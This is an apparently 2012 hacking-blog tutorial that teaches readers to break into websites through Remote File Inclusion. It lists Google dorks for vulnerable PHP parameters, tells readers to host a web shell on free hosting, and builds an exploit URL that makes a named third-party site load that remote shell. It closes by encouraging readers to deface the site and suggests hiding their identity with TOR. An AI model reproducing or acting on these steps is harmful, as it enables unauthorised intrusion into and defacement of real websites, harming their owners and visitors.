|Hacks|Crack|Tips |Tricks|Cracks |Programs|Tutorials |Movies|Games|

Breaking

Monday, July 16, 2012

[TUT] {2} How to hack a website using RFI method

Hello Friends...
Chinmoy here.
On my last post HACK WEBSITES | DEFACE ANY WEBSITE | REMOTE FILE INCLUSION ATTACK
I have posted the method to hack sites using RFI.
Today again i am going to teach you how to hack website using RFI.

___________________________________________________
Hide your IP {Privacy} Using TOR or Hotspotshield
___________________________________________________

RFI ( Remote File Inclusion ) is a method of injecting the remote file link to the server and get the site access. By this vulnerability attacker can deface or compromise the data from the site.
* Before getting start ( Things required )
  • A shell uploaded in any webhosting try my3gb( dot )com ( Any shell you like )
  • Vulnerable site
  • A sharp brain ;)
Mostly Used Dorks for RFI :-
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
How to Hack website using RFI method
After uploading the shell in the hosting get it’s link eg:- username.my3gb.com/shell_name.php . Now it’s for the Vulnerable site.
You can get them by Using dorks. I am using this site :- http://www.cbspk.com
Here’s the vulnerable the link of the site :- http://www.cbspk.com/v2/index.php?page=site link here.
now to check whether the site is vulnerable or not you have to put the any site link after ?page= for example :-
http://www.cbspk.com/v2/index.php?page=http://google.com
If it will open google.com in the same page then it’s vulnerable and if it didn’t then check any other site.
Now after getting the vulnerable site replace the http://google.com with your shell link. Now exploit link will be :-
http://www.cbspk.com/v2/index.php?page=http://username.my3gb.com/shell.php?
And add ? also to the link if the site is vulnerable it will embedded the page to the site.
After successfully execution. The only thing left is your creativity Defacing ;)
Hope you enjoyed the tutorial ” How to hack a website using RFI method “  and don’forget to share it :)